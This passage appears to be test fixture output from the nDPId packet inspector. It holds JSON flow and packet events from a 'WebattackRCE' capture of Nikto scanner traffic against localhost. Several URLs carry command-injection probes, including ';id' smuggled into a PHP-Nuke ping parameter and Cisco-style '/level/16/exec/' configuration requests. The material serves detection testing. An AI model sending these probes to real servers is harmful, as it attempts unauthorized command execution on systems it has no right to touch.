+00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01123{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7560000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7560000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7560000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pls\/simpledad\/admin_\/dadentries.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001167)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_packet_id":1,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277565,"pkt":"AAAAAAAAAAAAAAAACABFAADKFqFAAEAGJYt\/AAABfwAAAcXuH5Ag7S5xgHE61oAYAED+vgAAAQEICp1m\/mWdZv5lR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9wd2QgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1MykNCg0K"} 
+01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":554,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277565,"flow_last_seen":1576420277565,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277565,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50670,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/pwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001253)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_packet_id":1,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277566,"pkt":"AAAAAAAAAAAAAAAACABFAADZY3pAAEAG2KJ\/AAABfwAAAcXwH5Bf2FuYp3IH4oAYAED+zQAAAQEICp1m\/madZv5mR0VUIC9sZXZlbC8xNi9leGVjLy0vLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNTQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277566,"flow_last_seen":1576420277566,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277566,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50672,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/-\/\/\/show\/configuration","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001254)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":1,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277567,"pkt":"AAAAAAAAAAAAAAAACABFAAC9ybtAAEAGcn1\/AAABfwAAAcXyH5BbOPFKogxutoAYAED+sQAAAQEICp1m\/medZv5nR0VUIC9sZXZlbC8xNiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU1KQ0KDQo="} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277567,"flow_last_seen":1576420277567,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277567,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001255)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277568,"pkt":"AAAAAAAAAAAAAAAACABFAADDBTJAAEAGNwF\/AAABfwAAAcX0H5Cobz3BWm\/3E4AYAED+twAAAQEICp1m\/midZv5oR0VUIC9sZXZlbC8xNi9leGVjLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjU2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":557,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277568,"flow_last_seen":1576420277568,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277568,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001256)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277570,"pkt":"AAAAAAAAAAAAAAAACABFAADVrDFAAEAGj+9\/AAABfwAAAcX2H5DQ55TgYEZuMYAYAED+yQAAAQEICp1m\/mqdZv5qR0VUIC9sZXZlbC8xNi9leGVjLy9zaG93L2FjY2Vzcy1saXN0cyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01083{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":558,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277570,"flow_last_seen":1576420277570,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277570,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show\/access-lists","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001257)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1576420277572,"pkt":"AAAAAAAAAAAAAAAACABFAADf3g5AAEAGXgh\/AAABfwAAAcX4H5Dm0Ob+nlg5uYAYAED+0wAAAQEICp1m\/mydZv5sR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L2NvbmZpZ3VyYXRpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI1OCkNCg0K"} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":559,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277572,"flow_last_seen":1576420277572,"flow_idle_time":7560000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":171,"midstream":1,"thread_ts_msec":1576420277572,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 
